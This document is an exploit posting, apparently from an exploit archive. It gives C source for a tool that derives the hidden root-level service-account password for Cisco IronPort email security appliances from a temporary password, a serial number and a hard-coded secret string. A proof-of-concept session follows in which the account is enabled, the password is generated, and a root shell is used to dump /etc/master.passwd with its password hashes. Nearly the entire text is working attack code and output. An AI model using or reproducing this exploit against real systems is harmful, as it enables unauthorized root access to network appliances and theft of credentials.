Cisco Exploit

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <ctype.h>
5. #include "md5.h"
6. #include "getopt.h"
7.  
8. #define MAX_BUFFER 128
9. #define SECRET_PASS "woofwoof"
10.  
11. void usage(char *name);
12. void to_lower(char *str);
13. void fuzz_string(char *str);
14.  
15. int main(int argc, char *argv[]) {
16. if (argc < 2) { usage(argv[0]); }
17. int opt;
18. int index;
19. char *temp_pass = { 0 };
20. char *serial_no = { 0 };
21. char *secret_pass = SECRET_PASS;
22. char service[MAX_BUFFER] = { 0 };
23. unsigned char digest[16] = { 0 };
24. while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
25. switch (opt)
26. {
27. case 'p':
28. temp_pass = optarg;
29. break;
30. case 's':
31. serial_no = optarg;
32. break;
33. case 'h': usage(argv[0]);
34. break;
35. default:
36. printf_s("Wrong Argument: %s\n", argv[1]);
37. break;
38. }
39. }
40.  
41. for (index = optind; index < argc; index++) {
42. usage(argv[0]);
43. exit(0);
44. }
45.  
46. if (temp_pass == NULL || serial_no == NULL) {
47. usage(argv[0]);
48. exit(0);
49. }
50.  
51. if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
52. to_lower(serial_no);
53. fuzz_string(temp_pass);
54. strcpy_s(service, sizeof(service), temp_pass);
55. strcat_s(service, sizeof(service), serial_no);
56. strcat_s(service, sizeof(service), secret_pass);
57.  
58. MD5_CTX context;
59. MD5_Init(&context);
60. MD5_Update(&context, service, strlen(service));
61. MD5_Final(digest, &context);
62. printf_s("Service Password: ");
63. for (int i = 0; i < sizeof(digest)-12; i++)
64. printf("%02x", digest[i]);
65. }
66.  
67. return 0;
68. }
69.  
70. void fuzz_string(char *str) {
71. while (*str){
72. switch (*str) {
73. case '1': *str = 'i'; break;
74. case '0': *str = 'o'; break;
75. case '_': *str = '-'; break;
76. }
77. str++;
78. }
79. }
80.  
81. void to_lower(char *str) {
82. while (*str) {
83. if (*str >= 'A' && *str <= 'Z') {
84. *str += 0x20;
85. }
86. str++;
87. }
88. }
89.  
90. void usage(char *name) {
91. printf_s("\nUsage: %s -p password -s serial\n", name);
92. printf_s(" -p <password> | Cisco Service Temp Password\n");
93. printf_s(" -s <serial> | Cisco Serial Number\n");
94. printf_s(" -h | This Help Menu\n");
95. printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
96. exit(0);
97. }
98.  
99.  
100.  
101. PoC:
102.  
103. Enable Service Account
104. ----------------------
105. root@kali:~# ssh -lenablediag 192.168.0.158
106. Password:
107. Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
108. Copyright (c) 2001-2013, Cisco Systems, Inc.
109.  
110.  
111. AsyncOS 8.5.5 for Cisco C100V build 280
112.  
113. Welcome to the Cisco C100V Email Security Virtual Appliance
114.  
115. Available Commands:
116. help -- View this text.
117. quit -- Log out.
118. service -- Enable or disable access to the service system.
119. network -- Perform emergency configuration of the diagnostic network interface.
120. clearnet -- Resets configuration of the diagnostic network interface.
121. ssh -- Configure emergency SSH daemon on the diagnostic network interface.
122. clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
123. tunnel -- Start up tech support tunnel to IronPort.
124. print -- Print status of the diagnostic network interface.
125. reboot -- Reboot the appliance.
126.  
127. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
128. Service Access currently disabled.
129. ironport.example.com> service
130.  
131. Service Access is currently disabled. Enabling this system will allow an
132. IronPort Customer Support representative to remotely access your system
133. to assist you in solving your technical issues. Are you sure you want
134. to do this? [Y/N]> Y
135.  
136. Enter a temporary password for customer support to use. This password may
137. not be the same as your admin password. This password will not be able
138. to be used to directly access your system.
139. []> cisco123
140.  
141. Service access has been ENABLED. Please provide your temporary password
142. to your IronPort Customer Support representative.
143.  
144. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
145. Service Access currently ENABLED (0 current service logins)
146. ironport.example.com>
147.  
148.  
149. Generate Service Account Password
150. ---------------------------------
151. Y:\Vulnerabilities\cisco\ironport>woofwoof.exe
152.  
153. Usage: woofwoof.exe -p password -s serial
154. -p <password> | Cisco Service Temp Password
155. -s <serial> | Cisco Serial Number
156. -h | This Help Menu
157.  
158. Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
159.  
160. Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
161. F508A4
162. Service Password: b213c9a4
163.  
164.  
165. Login to the appliance as Service account with root privileges
166. --------------------------------------------------------------
167. root@kali:~# ssh -lservice 192.168.0.158
168. Password:
169. Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
170. Copyright (c) 2001-2013, Cisco Systems, Inc.
171.  
172.  
173. AsyncOS 8.5.5 for Cisco C100V build 280
174.  
175. Welcome to the Cisco C100V Email Security Virtual Appliance
176. # uname -a
177. FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014
178. auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
179.  
180. # cat /etc/master.passwd
181. # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
182. root:*:0:0::0:0:Mr &:/root:/sbin/nologin
183. service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
184. enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access
185. control:/root:/data/bin/enablediag.sh
186. adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password
187. Tool:/data/home/admin:/data/bin/adminpassword.sh
188. daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
189. operator:*:2:5::0:0:System &:/:/sbin/nologin
190. bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
191. tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
192. kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
193. man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
194. sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
195. nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
196. support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
197. admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
198. clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
199. smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
200. spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
201. pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
202. ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
203.  
204. */
205.  
206. #  0day.today [2018-04-14]  #